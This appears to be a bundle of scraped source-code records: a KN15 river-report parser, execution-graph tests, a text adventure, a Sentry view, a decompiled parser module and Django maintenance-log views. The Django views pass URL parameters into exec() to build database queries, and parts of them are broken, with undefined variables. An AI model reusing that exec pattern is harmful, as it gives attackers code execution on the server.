см\"\n]\n\nprecipitation_duration_scale = [\n \"менее 1 ч\",\n \"от 1 до 3 ч\",\n \"от 3 до 6 ч\",\n \"от 6 до 12 ч\",\n \"более 12 ч\"\n]\n\nice_conditions = [\n 'Сало',\n 'Снежура',\n 'Забереги (первичные; наносные); припай шириной менее 100 м - для озер,водохранилищ',\n 'Припай шириной более 100 м - для озер, водохранилищ',\n 'Забереги нависшие',\n '*Ледоход; для озер, водохранилищ - дрейф льда; снегоход - для пересыхающих рек',\n '*Ледоход, лед из притока, озера, водохранилища',\n '*Ледоход поверх ледяного покрова',\n '*Шугоход',\n 'Внутриводный лед (донный; глубинный)',\n 'Пятры',\n 'Осевший лед (на береговой отмели после понижения уровня)',\n 'Навалы льда на берегах (ледяные валы)',\n 'Ледяная перемычка в створе поста',\n 'Ледяная перемычка выше поста',\n 'Ледяная перемычка ниже поста',\n 'Затор льда выше поста',\n 'Затор льда ниже поста',\n 'Затор льда искусственно разрушается',\n 'Зажор льда выше поста',\n 'Зажор льда ниже поста',\n 'Зажор льда искусственно разрушается',\n 'Вода на льду',\n 'Вода течет поверх льда (после промерзания реки; при наличии воды подо льдом)',\n '*Закраины',\n 'Лед потемнел',\n 'Снежница',\n 'Лед подняло (вспучило)',\n 'Подвижка льда',\n 'Разводья',\n 'Лед тает на месте',\n '*Забереги остаточные',\n 'Наслуд',\n '*Битый лед - для озер, водохранилищ, устьевых участков рек',\n '*Блинчатый лед - для озер, водохранилищ, устьевых участков рек',\n '*Ледяные поля - для озер, водохранилищ, устьевых участков рек',\n '*Ледяная каша - для озер, водохранилищ, устьевых участков рек',\n 'Стамуха',\n 'Лед относит (отнесло) от берега - для озер, водохранилищ',\n 'Лед прижимает (прижало) к берегу - для озер, водохранилищ',\n '*Ледостав неполный',\n '*Ледяной покров с полыньями (промоинами, пропаринами)',\n 'Ледостав, ровный ледяной покров',\n 'Ледостав, ледяной покров с торосами',\n 'Ледяной покров с грядами торосов - для водохранилищ',\n 'Шуговая дорожка',\n 'Подо льдом шуга',\n 'Трещины в ледяном покрове',\n 'Наледь',\n 'Лед нависший(ледяной мост)',\n 'Лед ярусный (ледяной покров состоит из отдельных слоев,между которыми находится вода или воздушная п',\n 'Лед на дне (осевший или вследствие предшествующего промерзания реки)',\n 'Река (озеро) промерзла',\n 'Лед искусственно разрушен (ледоколом, взрыванием и др.техническими средствами',\n 'Наледная вода',\n 'Чисто',\n '*Лесосплав',\n 'Залом леса выше поста',\n 'Залом леса ниже поста',\n '*Растительность у берега',\n '*Растительность по всему сечению потока',\n '*Растительность по сечению потока пятнами',\n 'Растительность стелется по дну',\n 'Растительность на гидростворе выкошена',\n 'Растительность легла на дно (осенью)',\n 'Растительность занесена илом (во время спуска рыбных прудов и т.д.).',\n 'Растительность погибла в результате загрязнения реки',\n 'Обвал (оползень) берега в створе поста',\n 'Обвал (оползень) берега выше поста',\n 'Обвал (оползень) берега ниже поста',\n 'Дно��глубительные работы в русле',\n 'Намывные работы в русле',\n 'Проведена расчистка русла',\n 'Русло реки сужено на гидростворе для измерения расхода воды',\n 'Образовалась коса',\n 'Коса',\n 'Образовался осередок',\n 'Осередок',\n 'Образовался остров',\n 'Остров',\n 'Смещение русла в плане',\n 'Снежный завал в створе поста',\n 'Снежный завал выше поста',\n 'Снежный завал ниже поста',\n 'Прорыв снежного завала',\n 'Прохождение селя',\n 'Течение реки изменилось на противоположное',\n 'Сгон воды - для устьевых участков рек, озер, водохранилищ',\n 'Нагон воды - для устьевых участков рек, озер, водохранилищ',\n 'Река пересохла',\n 'Волнение слабое, 1 балл - для больших рек, озер, водохранилищ',\n 'Волнение умеренное, 2-3 балла - для больших рек, озер, водохранилищ',\n 'Волнение сильное, более 4 баллов - для больших рек, озер, водохранилищ',\n 'Стоячая вода (перемерз или пересох расположенный выше или ниже перекат)',\n 'Стоячая вода подо льдом',\n 'Прекратилась лодочная переправа',\n 'Прекратилось пешее сообщение',\n 'Началось пешее сообщение',\n 'Началось движение транспорта по льду',\n 'Прекратилось движение транспорта по льду',\n 'Началась лодочная переправа',\n 'Подпор от озера, реки',\n 'Начало навигации',\n 'Конец навигации',\n 'Забор воды выше поста',\n 'Забор воды ниже поста',\n 'Забор воды выше поста прекратился',\n 'Забор воды ниже поста прекратился',\n 'Сброс воды выше поста',\n 'Сброс воды ниже поста',\n 'Сброс воды выше поста прекратился',\n 'Сброс воды ниже поста прекратился',\n 'Плотина (перемычка, запруда, дамба) выше поста',\n 'Плотина (перемычка, запруда, дамба) ниже поста',\n 'Разрушена плотина (перемычка, запруда, дамба) выше поста',\n 'Разрушена плотина (перемычка, запруда, дамба) ниже поста',\n 'Подпор от засорения русла',\n 'Подпор от мостовых переправ',\n 'Пропуски воды из озера, водохранилищ'\n]\n\nclass KN15Error(Exception):\n \"\"\"Class for exceptions raised when parsing report string\"\"\"\n pass\n\nclass KN15():\n @staticmethod\n def parse():\n pass\n\n def __init__(self, report):\n super().__init__()\n self._report = report\n self._basin = None\n self._station_id = None\n self._YY = None\n self._GG = None\n self._n = None\n self._stage = None\n self._change_stage = None\n self._change_stage_sign = None\n self._prev_stage = None\n self._water_temp = None\n self._air_temp = None\n self._ice = None\n self._water_condition = None\n self._ice_thickness = None\n self._snow_depth = None\n self._discharge_integer_part = None\n self._discharge = None\n self._precip_amount = None\n self._precip_duration = None\n self._parse()\n\n def _parse(self):\n identifier = self._report[:5]\n self._basin = identifier[:2]\n self._station_id = identifier[2:]\n parts = re.split(fr'\\s(?={additional_sections_tags})', self._report[6:])\n if not re.match(additional_sections_tags, parts[0]):\n match = re.match(report_pattern, parts[0])\n if match is None:\n raise KN15Error(\"Couldn't parse report string with regular expression\")\n parsed = match.groupdict()\n self._YY = parsed.get('YY')\n self._GG = parsed.get('GG')\n self._n = parsed.get('n')\n self._stage = parsed.get('stage')\n self._change_stage = parsed.get('change_stage')\n self._change_stage_sign = parsed.get('change_stage_sign')\n self._prev_stage = parsed.get('prev_stage')\n self._water_temp = parsed.get('water_temp')\n self._air_temp = parsed.get('air_temp')\n self._ice = parsed.get('ice')\n self._water_condition = parsed.get('water_condition')\n self._ice_thickness = parsed.get('ice_thickness')\n self._snow_depth = parsed.get('snow_depth')\n self._discharge_integer_part = parsed.get('discharge_integer_part')\n self._discharge = parsed.get('discharge')\n self._precip_amount = parsed.get('precip_amount')\n self._precip_duration = parsed.get('precip_duration')\n\n return parsed\n\n\n\n @property\n def identifier(self):\n return f'{self._basin}{self._station_id}'\n\n @property\n def basin(self):\n return self._basin\n\n @property\n def measure_time(self):\n if self._GG and not 0 <= int(self._GG) <= 23: raise KN15Error(f'Time of measure {self._GG} is not between 00 and 23')\n return self._GG\n \n @property\n def ice_conditions(self):\n if not self._ice:\n return None\n conditions = [{\n 'title': ice_conditions[int(self._ice[:2])-11],\n 'intensity': None\n }]\n second2digits = int(self._ice[2:])\n if second2digits < 11:\n conditions[0]['intensity'] = second2digits * 10\n else:\n conditions.append({\n 'title': ice_conditions[second2digits-11],\n 'intensity': None\n })\n return conditions\n\n @property\n def measure_day(self):\n \"\"\"\n measure day of month\n \"\"\"\n if self._YY and not 1 <= int(self._YY) <= 31: raise KN15Error(f'Day of month {self._YY} is not between 1 and 31')\n return self._YY\n\n @property\n def stage(self):\n if self._stage is not None:\n stage = int(self._stage)\n return stage if stage < 5000 else (5000 - stage)\n else:\n return None\n\n @property\n def discharge(self):\n if self._discharge is not None:\n return float(self._discharge) * pow(10, int(self._discharge_integer_part) - 3)\n else:\n return None\n\n @property\n def ice_thickness(self):\n if self._ice_thickness:\n return int(self._ice_thickness)\n else:\n return None\n\n @property\n def snow_depth(self):\n if self._snow_depth is not None:\n return snow_depth_scale[int(self._snow_depth)]\n else:\n return None\n\n @property\n def water_temperature(self):\n if self._water_temp is not None:\n return int(self._water_temp) / 10\n else:\n return None\n\n @property\n def air_temperature(self):\n if self._air_temp is not None and self._air_temp not in ('//', '99'):\n air_temp = int(self._air_temp)\n return air_temp if air_temp < 50 else (50 - air_temp)\n else:\n return None\n\n @property\n def precipitation_duration(self):\n if self._precip_duration is not None:\n return precipitation_duration_scale[int(self._precip_duration)]\n else:\n return None\n\n @property\n def precipitation_amount(self):\n if self._precip_amount is not None:\n precip_amount = float(self._precip_amount)\n return precip_amount if precip_amount < 990 else (precip_amount - 990)/10\n else:\n return None\n\n def decode(self):\n return {\n 'stage': self.stage,\n 'discharge': self.discharge,\n 'ice_thickness': self.ice_thickness,\n 'snow_depth': self.snow_depth,\n 'precipitation_duration': self.precipitation_duration,\n 'precipitation_amount': self.precipitation_amount,\n 'air_temperature': self.air_temperature,\n 'water_temperature': self.water_temperature,\n 'identifier': self.identifier,\n 'basin': self.basin,\n 'day_of_month': self.measure_day,\n 'synophour': self.measure_time,\n 'ice_conditions': self.ice_conditions\n }\n\n\ndef bulletin_reports(bulletin):\n \"\"\"\n each report in bulletin start with new line and ended with '='\n return iterator for reports in bulletin \n \"\"\"\n return map(lambda m: re.sub(r\"\\s+\", ' ', m.group(1)).strip(), re.finditer(report_bounds, bulletin))\n\n\ndef decode(bulletin):\n if bulletin.split()[0].upper() != 'HHZZ':\n raise TypeError(\"Report does not contain HHZZ in first line\")\n return bulletin_reports(bulletin[4:])\n\n\ndef parse_file(filename):\n with open(filename, 'r') as f:\n bulletin = f.read()\n for report in decode(bulletin):\n try:\n return KN15(report).decode()\n except Exception as ex:\n print(ex)\n\n\ndef parse_report(report):\n try:\n return KN15(report).decode()\n except Exception as ex:\n print(ex)\n\n\n@click.command()\n@click.option('--filename', help='path to file', default=False)\n@click.option('--report', help='Report string to decode', default=False)\ndef parse(filename, report):\n if filename:\n print(parse_file(filename))\n if report:\n print(parse_report(report))\n\n\nif __name__ == \"__main__\":\n parse()\n\n\n","sub_path":"kn15/kn15.py","file_name":"kn15.py","file_ext":"py","file_size_in_byte":16016,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"189716422","text":"import longbow\nimport longbow.execute\n\nimport os.path\nimport unittest\n\nimport numpy as np\n\n\nclass TestExecutionGraphSimple(unittest.TestCase):\n def setUp(self):\n super(TestExecutionGraphSimple, self).setUp()\n self.graph = longbow.execute.ExecutionGraph(\n dependencies={\n 4: {2, 3},\n 2: {1},\n 3: {1},\n },\n evaluated={1}\n )\n\n def test_only_input(self):\n self.assertEqual(self.graph.ready, {2, 3})\n\n def test_eval_2(self):\n self.assertEqual(self.graph.with_evaluation(2).ready, {3})\n\n def test_eval_3(self):\n self.assertEqual(self.graph.with_evaluation(3).ready, {2})\n\n def test_eval_2_3(self):\n self.assertEqual(self.graph.with_evaluation(2, 3).ready, {4})\n\n def test_eval_2_3_4(self):\n self.assertEqual(self.graph.with_evaluation(2, 3, 4).ready, set())\n\n\nclass TestDummyExecutor(unittest.TestCase):\n def setUp(self):\n super(TestDummyExecutor, self).setUp()\n self_dir = os.path.dirname(__file__)\n lib_path = os.path.join(self_dir, \"..\", \"build\", \"liblongbow.dylib\")\n lib_path = os.path.abspath(lib_path)\n self.lib = longbow.load_library(lib_path)\n\n def test_subtract_graph(self):\n graph = self.lib.get_graph('longbow::subtract_graph')\n\n executor = longbow.execute.DummyExecutor()\n values = longbow.execute.execute(executor, graph, {\n \"a\": 15.0,\n \"b\": 2.0\n })\n values = longbow.execute.wait(values)\n self.assertEqual(values, {\"c\": 13.0})\n\n def test_evaluate_aggregation(self):\n graph = self.lib.get_graph('longbow::sum_graph')\n node = graph.get_node(2)\n\n executor = longbow.execute.DummyExecutor()\n actual = longbow.execute.evaluate(executor, node, (\n [0.0],\n longbow.execute.Partitions([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]]),\n ))\n\n actual = actual.result()\n\n expected = 1 + 2 + 3 + 4 + 5 + 6\n self.assertAlmostEqual(actual, expected)\n\n def test_sum_graph(self):\n graph = self.lib.get_graph(\"longbow::sum_graph\")\n executor = longbow.execute.DummyExecutor()\n\n actual = longbow.execute.execute(executor, graph, {\n \"input\": longbow.execute.Partitions([\n [1.0, 2.0, 3.0, 4.0, 5.0],\n [6.0, 7.0, 8.0, 9.0, 0.0]\n ])\n })\n actual = longbow.execute.wait(actual)\n expected = 1 + 2 + 3 + 4 + 5 + 6 + 7 + 8 + 9 + 0\n\n self.assertAlmostEqual(actual['output'], expected)\n\n def test_normalize_graph_bound_variable(self):\n graph = self.lib.get_graph('longbow::normalize_graph')\n node = graph.get_node(1)\n\n self.assertEqual(node.type, \"longbow::cgraph::BoundVariable\")\n actual = node.transform(())\n\n np.testing.assert_allclose(actual, [[0], [0], [0]])\n\n def test_normalize_graph_transformed_partitions_final(self):\n graph = self.lib.get_graph('longbow::normalize_graph')\n node = graph.get_node(7)\n self.assertEqual(node.type, \"longbow::cgraph::TransformedPartitions\")\n\n actual = node.transform((\n [2.0, 3.0, 4.0],\n (np.int32(2), 0.0, 1.0)\n ))\n\n s0, s1, s2 = 2, 0, 1\n mean = s1 / s0\n std = (s2 / s0 - mean ** 2.0) ** 0.5\n\n expected = [2.0 / std, 3.0 / std, 4.0 / std]\n\n np.testing.assert_allclose(actual, expected)\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","sub_path":"python/test/test_execute.py","file_name":"test_execute.py","file_ext":"py","file_size_in_byte":3513,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"467889928","text":"from room import Room\nfrom player import Player\nfrom item import Item, Treasure, LightSource\nimport textwrap\nimport sys\n# Declare all the rooms\n\nroom = {\n 'outside': Room(\"Outside Cave Entrance\",\n \"North of you, the cave mount beckons\", [LightSource(\"lamp\", \"a battered old lamp with some oil in it\")], True),\n\n 'bridge': Room(\"Bridge\", \"\"\"Rough winds blow acoss a lonely bridge. The smell of dragon fire and brimstone is heavy here.\nOn the other side you see a red dragon sleeping in the sunlight. It guards the entrance to an ancient cathedral\"\"\", [], True),\n\n 'cathedral': Room(\"Cathedral\", \"\"\"Broken pews, torn tapestries, and skeletons of past adventurers are all that remain inside.\nAt the end, sunlight illuminates the lady's chapel. You see a crack in the wall.\"\"\", [Treasure(\"ruby\", \"crimson red jewel worn by ancient priests\", 10000)], False),\n\n 'foyer': Room(\"Foyer\", \"\"\"Dim light filters in from the south. Dusty\npassages run north and east.\"\"\", [LightSource(\"torch\", \"an everlasting torch that gives off a yellow light\"), Item(\"potion\", \"a bright red potion\"), \nItem(\"parchment\", \"dusy, yello parchment that's ready to disintegrate\"), Treasure(\"sapphire\", \"sapphire set inside a silver ring\", 20000)], False),\n\n 'armory': Room(\"Armory\", \"\"\"You find a small armory filled with rusted weapons and some tools. At the far end lies a locked chest\nand a blackened shield. You find an encryption on the chest lid: 'The ancient hero offers his sword but only to those he deems worthy'\"\"\", [\nItem(\"shield\", \"a battered steel shield that's been blackened with fire\")], False),\n\n 'overlook': Room(\"Grand Overlook\", \"\"\"A steep cliff appears before you, falling\ninto the darkness. Ahead to the north, a light flickers in\nthe distance, but there is no way across the chasm.\"\"\", [Item(\"sword\", \"a broadsword fit for a hero\"), Treasure(\"emerald\", \"hero's emerald necklace\", 30000)], True),\n\n 'narrow': Room(\"Narrow Passage\", \"\"\"The narrow passage bends here from west\nto north. The smell of gold permeates the air.\"\"\", [], False),\n\n 'treasure': Room(\"Treasure Chamber\", \"\"\"You've found the long-lost treasure\nchamber! Sadly, it has already been completely emptied by\nearlier adventurers. The only exit is to the south.\"\"\", [Item(\"key\", \"a simple brass key\")], False),\n}\n\n\n# Link rooms together\n\nroom['outside'].n_to = room['foyer']\nroom['outside'].e_to = room['bridge']\nroom['bridge'].w_to = room['outside']\nroom['bridge'].n_to = room['cathedral']\nroom['cathedral'].s_to = room['bridge']\nroom['cathedral'].n_to = room['narrow']\nroom['armory'].e_to = room['foyer']\nroom['foyer'].s_to = room['outside']\nroom['foyer'].n_to = room['overlook']\nroom['foyer'].e_to = room['narrow']\nroom['foyer'].w_to = room['armory']\nroom['overlook'].s_to = room['foyer']\nroom['narrow'].w_to = room['foyer']\nroom['narrow'].n_to = room['treasure']\nroom['narrow'].s_to = room['cathedral']\nroom['treasure'].s_to = room['narrow']\n\n#\n# Main\n#\n\n# Make a new player object that is currently in the 'outside' room.\nplayer = Player(\"Justin\", room['outside'])\n# Write a loop that:\n#\n# * Prints the current room name\n# * Prints the current description (the textwrap module might be useful here).\n# * Waits for user input and decides what to do.\n#\n# If the user enters a cardinal direction, attempt to move to the room there.\n# Print an error message if the movement isn't allowed.\n#\n# If the user enters \"q\", quit the game.\n\ngeneral_inputs = [\"q\", \"i\", \"score\"] # valid general inputs\nmove_inputs = [\"n\", \"e\", \"s\", \"w\"] # valid inputs to advance game\nitem_inputs = [\"get\", \"take\", \"drop\"] # valid item interactions\n\nquit = False # describes overall game state\n\nwhile not quit:\n\tcurrent = player.room\n\tdescription = textwrap.fill(current.description)\n\n\t# current room has light\n\tif current.is_light:\n\t\t# show player the room they are in\n\t\tprint(\"{0}\\n{1}\".format(current.name, description))\n\t\t# show player all items available in current room\n\t\tif len(current.items) > 0:\n\t\t\tfor item in current.items:\n\t\t\t\tprint(\"You see:\\n\\ta {0}\\n\\t{1}\".format(item.showName(), item.showDescription()))\n\t\telse:\n\t\t\tprint(\"There are no items in this room\")\n\telse:\n\t\t# no light in current room\n\t\tprint(\"It's pitch black!\")\n\t\tfor item in current.items:\n\t\t\tif isinstance(item, LightSource):\n\t\t\t\tprint(\"{0} might help you see through the darkness\".format(item.name))\n\n\t# take player commands and remove formatting\n\tplayer_input = input(\"Command: \").strip().lower()\n\t# separate player commands into verb + noun\n\tparsed = player_input.split(\" \")\n\n\t# Single Word Command Input Parsing\n\tif len(parsed) == 1:\n\t\tif parsed[0] in general_inputs:\n\t\t\t# player quits/exits game\n\t\t\tif parsed[0] == \"q\" or parsed[0] == \"quit\":\n\t\t\t\tquit = True\n\t\t\t# show player inventory\n\t\t\tif parsed[0] == \"i\":\n\t\t\t\tprint(player.showAllItems())\n\t\t\t# show player score\n\t\t\tif parsed[0] == \"score\":\n\t\t\t\tprint(\"Your score is {0}\".format(player.score))\n\t\telif parsed[0] in move_inputs:\n\t\t\tdirAttr = parsed[0] + \"_to\"\n\t\t\t# check if move input is valid\n\t\t\tif hasattr(current, dirAttr):\n\t\t\t\tplayer.room = getattr(current, dirAttr) # update player's location\n\t\t\telse:\n\t\t\t\t# invalid room change\n\t\t\t\tprint(\"You can't go that way!\")\n\t\telse:\n\t\t\t# unknown single command\n\t\t\tprint(\"That command doesn't make sense!\")\n\n\t# Two Word Command Input Parsing\n\telif len(parsed) == 2:\n\t\tverb = parsed[0] # action player takes with an item\n\t\tnoun = parsed[1] # noun itself\n\n\t\tif verb in item_inputs:\n\t\t\tif verb == \"get\" or verb == \"take\":\n\t\t\t\tfor index, item in enumerate(current.items):\n\t\t\t\t\tif item.name == noun:\n\t\t\t\t\t\titem.on_take(player, item.name)\n\t\t\t\t\t\t# remove item from room\n\t\t\t\t\t\tcurrent.items.remove(current.items[index])\n\t\t\t\t\t\t# add item to player inventory\n\t\t\t\t\t\tplayer.inventory.append(item)\n\t\t\tif verb == \"drop\":\n\t\t\t\tfor index, item in enumerate(player.inventory):\n\t\t\t\t\tif item.name == noun:\n\t\t\t\t\t\titem.on_drop(player, item.name)\n\t\t\t\t\t\t# remove item from player inventory\n\t\t\t\t\t\tplayer.inventory.remove(player.inventory[index])\n\t\t\t\t\t\t# add item to room\n\t\t\t\t\t\tcurrent.items.append(item)\n\t\telse:\n\t\t\tprint(\"You can't do that with an item!\")\n\telse:\n\t\tprint(\"That doesn't mean anything!\")\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"src/adv/adv.py","file_name":"adv.py","file_ext":"py","file_size_in_byte":6147,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"62062542","text":"from __future__ import absolute_import\n\nfrom django import forms\nfrom django.contrib import messages\nfrom django.core.urlresolvers import reverse\n\nfrom sentry.api import client\nfrom sentry.models import Project, Team\nfrom sentry.web.forms.add_project import AddProjectForm\nfrom sentry.web.frontend.base import OrganizationView\nfrom sentry.utils.http import absolute_uri\n\nERR_NO_TEAMS = 'You cannot create a new project because there are no teams to assign it to.'\n\n\nclass AddProjectWithTeamForm(AddProjectForm):\n team = forms.ChoiceField(\n choices=(),\n required=True,\n help_text='The team controls who has access to this project.',\n )\n\n class Meta:\n fields = ('name', 'team')\n model = Project\n\n def __init__(self, user, organization, team_list, *args, **kwargs):\n super(AddProjectWithTeamForm, self).__init__(organization, *args, **kwargs)\n\n self.team_list = team_list\n\n if len(self.team_list) == 1:\n del self.fields['team']\n else:\n self.fields['team'].choices = ((t.slug, t.name) for t in team_list)\n self.fields['team'].widget.choices = self.fields['team'].choices\n\n def clean_team(self):\n value = self.cleaned_data['team']\n for team in self.team_list:\n if value == team.slug:\n return team\n return None\n\n def save(self, actor, ip_address):\n team = self.cleaned_data.get('team', self.team_list[0])\n return super(AddProjectWithTeamForm, self).save(actor, team, ip_address)\n\n\nclass CreateProjectView(OrganizationView):\n # While currently the UI suggests teams are a parent of a project, in reality\n # the project is the core component, and which team it is on is simply an\n # attribute. Because you can already change the team of a project via mutating\n # it, and because Sentry intends to remove teams as a hierarchy item, we\n # allow you to view a teams projects, as well as create a new project as long\n # as you are a member of that team and have project scoped permissions.\n required_scope = 'project:write'\n\n def get_form(self, request, organization, team_list):\n data = {\n 'team': request.GET.get('team'),\n }\n return AddProjectWithTeamForm(\n request.user, organization, team_list, request.POST or None, initial=data\n )\n\n def handle(self, request, organization):\n team_list = [\n t for t in Team.objects.get_for_user(\n organization=organization,\n user=request.user,\n ) if request.access.has_team_scope(t, self.required_scope)\n ]\n if not team_list:\n messages.error(request, ERR_NO_TEAMS)\n return self.redirect(reverse('sentry-organization-home', args=[organization.slug]))\n\n form = self.get_form(request, organization, team_list)\n if form.is_valid():\n team = form.cleaned_data.get('team', team_list[0])\n\n response = client.post(\n '/teams/{}/{}/projects/'.format(\n organization.slug,\n team.slug,\n ),\n data={\n 'name': form.cleaned_data['name'],\n },\n request=request\n )\n\n install_uri = absolute_uri(\n '/{}/{}/getting-started/'.format(\n organization.slug,\n response.data['slug'],\n )\n )\n\n if 'signup' in request.GET:\n install_uri += '?signup'\n\n return self.redirect(install_uri)\n\n context = {\n 'form': form,\n }\n\n return self.respond('sentry/create-project.html', context)\n","sub_path":"src/sentry/web/frontend/create_project.py","file_name":"create_project.py","file_ext":"py","file_size_in_byte":3755,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"605834580","text":"# uncompyle6 version 3.6.7\n# Python bytecode 3.6 (3379)\n# Decompiled from: Python 3.8.2 (tags/v3.8.2:7b3ab59, Feb 25 2020, 23:03:10) [MSC v.1916 64 bit (AMD64)]\n# Embedded file name: build/bdist.macosx-10.12-x86_64/egg/parsec/text.py\n# Compiled at: 2015-08-28 01:15:53\n# Size of source mod 2**32: 500 bytes\nfrom parsec.error import ParsecError\nfrom parsec import Parsec\n\ndef string(s):\n\n @Parsec\n def call(st):\n for chr in s:\n c = st.next()\n if chr != c:\n raise ParsecError(st, \"Expect '{0}' but got {1}\".format(s, c))\n else:\n return s\n\n return call\n\n\n@Parsec\ndef space(state):\n c = state.next()\n if c.isspace():\n return c\n raise ParsecError(st, 'Expect a space but got {0}'.format(c))","sub_path":"pycfiles/pyparser-1.0.tar/text.cpython-36.py","file_name":"text.cpython-36.py","file_ext":"py","file_size_in_byte":772,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"632552426","text":"from django.shortcuts import render\nfrom login import models as models\nfrom django.http import HttpResponse,HttpResponseRedirect\nfrom django.db import connection\nimport datetime\nfrom django.urls import reverse\nfrom django.contrib import messages\nfrom django.core.mail import send_mail\nfrom cryptography.fernet import Fernet as frt\nfrom operator import itemgetter\nfrom datetime import date\n# Create your views here.\ndef choice(request):\n # uid=request.POST.get('daily')\n # passw=request.POST.get('monthly')\n \n if 'daily' in request.POST:\n \n # context={\n # 'cdvordaily':[entry for entry in models.Cdvordaily.objects.all().values()],\n # 'datisdaily':[entry1 for entry1 in models.Datisdaily.objects.all().values()],\n # 'dmedaily':[entry for entry in models.Dmedaily.objects.all().values()],\n # 'dscndaily':[entry for entry in models.Dscndaily.objects.all().values()],\n # 'ndbdaily':[entry for entry in models.Ndbdaily.objects.all().values()],\n # 'scctvdaily':[entry for entry in models.Scctvdaily.objects.all().values()],\n # 'vhfdaily':[entry for entry in models.Vhfdaily.objects.all().values()]\n # }\n return render(request,'supervisor/daily.html')\n if 'monthly' in request.POST:\n # context={\n # 'cdvormonthly':[entry for entry in models.Cdvormonthly.objects.all().values()],\n # # 'datisdaily':[entry1 for entry1 in models.Datisdaily.objects.all().values()],\n # 'dmemonthly':[entry for entry in models.Dmemonthly.objects.all().values()],\n # 'dscnmonthly':[entry for entry in models.Dscnmonthly.objects.all().values()],\n # 'ndbmonthly':[entry for entry in models.Ndbmonthly.objects.all().values()],\n # 'scctvmonthly':[entry for entry in models.Scctvmonthly.objects.all().values()],\n # 'vhfmonthly':[entry for entry in models.Vhfmonthly.objects.all().values()]\n # }\n return render(request,'supervisor/monthly.html')\n if 'yearly' in request.POST:\n return render(request,'supervisor/yearly.html')\n \n \n if 'weekly' in request.POST:\n # context={\n # 'cdvorweekly':[entry for entry in models.Cdvorweekly.objects.all().values()],\n # 'datisweekly':[entry for entry in models.Datisweekly.objects.all().values()],\n # 'dmeweekly':[entry for entry in models.Dmeweekly.objects.all().values()],\n # 'dscnweekly':[entry for entry in models.Dscnweekly.objects.all().values()],\n # 'ndbweekly':[entry for entry in models.Ndbweekly.objects.all().values()],\n # 'scctvweekly':[entry for entry in models.Scctvweekly.objects.all().values()],\n # # 'vhfmonthly':[entry for entry in models.Vhfmonthly.objects.all().values()]\n # }\n # context['cdvorweekly']=checkpara(context['cdvorweekly'])\n \n # defect={'defect':defect} \n # context.update(defect)\n \n # print(defect)\n # print(context['cdvorweekly']) \n return render(request,'supervisor/weekly.html',context)\n \n x=1\n if x==1:\n # if request.session.get('dept')=='C':\n print(\"here\")\n today = date.today()\n week_ago = today - timedelta(days=7)\n info=models.Datisdlogs.objects.values().filter(date__gte = week_ago).order(-date)\n k=None\n for q,i in enumerate(info):\n if (str(i['remarks'])=='status of ups not normal' or str(i['remarks'])=='status of ups not normal(update)'):\n k=q\n break\n count=0 \n alert=0\n wdate=today\n rdate=week_ago\n if k != None: \n for j in info[k:]:\n if str(j['remarks'])=='status of ups not normal' or str(j['remarks'])=='status of ups not normal(update)':\n count=count+1\n wdate=j['date']\n if str(j['value'])=='All parameters NORMAL':\n rdate=j['date']\n if count>=3 & (wdate<rdate):\n alert=1 \n context.update({'alert':alert})\n\n print('alert= ',str(alert))\n \n return render(request,'supervisor/home.html')\n\ndef checkpara(temp):\n err_list=[]\n\n count=0\n for index,i in enumerate(temp):\n if i['ps_5v']<=4:\n i['err']=1\n i['ername']='ps_5v'\n else:\n i['err']=0\n \n # print(temp)\n return temp\ndef details(request,id,name):\n id=decode(request,id)\n if request.session.get('type')=='s':\n \n # print(name)\n \n str1='temp=models.'\n str2='.objects.filter(p_id='\n str3=').values()'\n str4='.objects.all('\n que=str1+name+str2+str(id)+str3\n exec(que,globals())\n str1='mrec=models.'\n que=str1+name+str4+str3+\".order_by('-date')\"\n exec(que,globals())\n # UNCOMMENT WHEN DONE WITH ALL LOG TABLES\n logname=name+'logs'\n logname=logname.replace('daily','d')\n logname=logname.replace('monthly','m')\n logname=logname.replace('weekly','w')\n logname=logname.replace('yearly','y')\n print(logname)\n name=name[0].lower()+name[1:]\n # # logname=name+'logs'\n str1='logs=models.'\n str2='.objects.filter(p_id='\n str3=').values()'\n request.session['pid']=id\n request.session['name']=name\n que=str1+logname+str2+str(id)+str3+\".order_by('-log_id')\"\n exec(que,globals())\n # print(\"logs:\")\n # print(logs)\n i=temp[0]\n i['e_token']=encode(request,str(i['emp_id']))\n i['p_token']=encode(request,str(i['p_id']))\n eng=models.Engineer.objects.filter(emp_id=temp[0]['emp_id']).values()\n # print(i)\n redir='supervisor:'+name\n if name =='datisdaily':\n return render(request,'supervisor/imp_details.html',{'eng':eng[0],'temp':i,'names':name,'redir':redir,'logs':logs,'mrec':mrec})\n elif name == 'datisweekly':\n \n return render(request,'supervisor/impw_details.html',{'eng':eng[0],'temp':i,'names':name,'redir':redir,'logs':logs,'mrec':mrec}) \n \n elif name == 'dscndaily':\n \n return render(request,'supervisor/dscn_imp_details.html',{'eng':eng[0],'temp':i,'names':name,'redir':redir,'logs':logs,'mrec':mrec}) \n elif name == 'dscnmonthly':\n \n return render(request,'supervisor/dscn_impm_details.html',{'eng':eng[0],'temp':i,'names':name,'redir':redir,'logs':logs,'mrec':mrec}) \n \n elif name == 'cdvordaily':\n \n return render(request,'supervisor/cdvor_imp_details.html',{'eng':eng[0],'temp':i,'names':name,'redir':redir,'logs':logs,'mrec':mrec}) \n elif name == 'cdvormonthly':\n \n return render(request,'supervisor/cdvor_impm_details.html',{'eng':eng[0],'temp':i,'names':name,'redir':redir,'logs':logs,'mrec':mrec}) \n \n # return render(request,'supervisor/imp_details.html',{'temp':i,'names':name})\n elif name == 'cdvorweekly':\n \n return render(request,'supervisor/cdvor_impw_details.html',{'eng':eng[0],'temp':i,'names':name,'redir':redir,'logs':logs,'mrec':mrec}) \n elif name == 'scctvdaily':\n \n return render(request,'supervisor/scctv_imp_details.html',{'eng':eng[0],'temp':i,'names':name,'redir':redir,'logs':logs,'mrec':mrec}) \n elif name == 'scctvmonthly':\n \n return 